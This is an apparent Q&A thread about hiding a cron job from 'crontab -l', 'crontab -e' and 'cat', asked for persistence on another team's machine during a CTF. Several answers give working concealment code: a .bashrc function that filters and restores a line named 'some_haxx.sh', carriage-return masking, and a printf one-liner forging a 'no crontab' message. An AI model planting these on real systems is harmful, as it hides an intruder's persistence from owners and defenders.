# Hide a crontab job

Tags: cron

Is it possible to add an entry to crontab and make it hidden so that it does not show up when the user is using `crontab -e` or `crontab -l`? I know [PPP](http://pwning.net/) was once attacked with technique during a Defcon CTF.

UPD: Recently I was participating in a CTF and had access to another team's machine. I wanted to keep my script running in a way that they won't notice. This is why I am looking for such stuff. So I prefer it to be doable by an unpriviledged user, but also an answer for the root user is helpful.

Comment: I think it would be helpful to understand why you want to hide the job. Also, please [edit] your question to explain whether it's for an ordinary user or for root.

Answer (score 3):

There are some fairly straightforward ways you could go about hiding an entry through misdirection (but they wouldn't stand up to heavy scrutiny).

For instance, here’s a simplified, proof of concept to interfere with the output of `crontab -l` on the fly.

```
crontab() {
  case "$*" in
    (*-l*) command crontab "$@" | grep -v "some_haxx.sh" ;;
    (*) command crontab "$@" ;;
  esac
}
```

You would have to slip this into the shell profile.

With a little effort one could make it more flexible, but the ruse could still be discovered if you just did `cat /var/spool/cron/someuser`

I would think a similar interference with `-e` could be achieved with some thought (dynamically removing the required entry before invoking the editor, and replacing it after editing.)

EDIT: there’s actually a simpler way to hide things from a user who is running `crontab -l`. Inline key sequences (<kbd>Ctrl-v</kbd><kbd>Ctrl-m</kbd>) assume that Vim is your editor:

```
* * * * * /somedir/some_haxx.sh # Ctrl-vCtrl-m# anything can go here this overwrites the cron entry you could just put lots of spaces here or a dummy cron entry
```

You won’t see anything too special in the editor (except for a `^M` midline). Save the file and quit the editor. This hack should work only when viewing the file from the command line.  What we are doing here is inserting a `carriage return` control character, this causes displayed text to be overwritten by everything that follows on the line.

This overcomes the `cat` flaw mentioned above, but you would still need some smoke and mirrors to hide it from a user who is editing with `crontab -e` -- as the editor will show the control character as `^M` still.

Comment: Could you elaborate more? I wasn't able to achieve such behavior on my machine while editing in vim

Comment: I've added a bit more detail.  As I've mentioned, if you want the `-e` view to mask this item you are going to have to engineer a mechanism to remove and re-add the particular line around the editor session.

Comment: Perhaps you could elaborate on why exactly you want to do this.

Comment: Thank you! It's great. Although it's not the complete solution but still very helpful. Moreover, I have updated the question

Answer (score 1):

As root, create a file under `/etc/cron.d/`, crontabs under `/etc/cron.d/` can't be displayed or edited through `crontab -l` and `crontab -e`.

`man cron`:

> This  directory can contain any file defining tasks following the format used in /etc/crontab

Answer (score 1):

After hearing about PPP on darknet diaries I had this same question. Found the answer here.

http://vladz.devzero.fr/004_hide-crontab.html

example:

```
printf "* * * * * >/tmp/x;\rno crontab for $USER\n" | crontab -
```

Comment: Sounds like it's just as well I always edit `crontab` files like this, `crontab -l >~/.crontab; ifvi ~/.crontab && crontab ~/.crontab` (where `ifvi` is a script that returns _true_ if the file contents was changed)

Answer (score 0):

No. The `crontab` file for each user is a plain text file that the `cron` daemon reads to see what to do.

There's no way to hide text in a plain text file.

One *could* "hide" (not really "hide", but "obfuscate") a job by putting it in some other user's `crontab`.

Answer (score 0):

Supplementing bxm's solution, the following function works to also hide the offending line when `crontab -e` is used to edit the cron file (add somewhere in `$USER/.bashrc`):

```
crontab() {
  case "$*" in
    (*-l*) command crontab "$@" | grep -v "some_haxx.sh" ;;
    (*-e*) H=$(grep "some_haxx.sh" /var/spool/cron/$USER); O=$(grep -v "some_haxx.sh" /var/spool/cron/$USER); echo "$O">/var/spool/cron/$USER; command crontab -e; echo "$H" >> /var/spool/cron/$USER ;;
    (*) command crontab "$@" ;;
  esac
}
```

You can then hide the relevant line from `cat` using the <kbd>CTRL-v</kbd><kbd>CTRL-m</kbd> trick in Vim bxm mentioned.

If the user changes shell for whatever reason, or invokes `bash` with `bash --norc`, the above function won't work.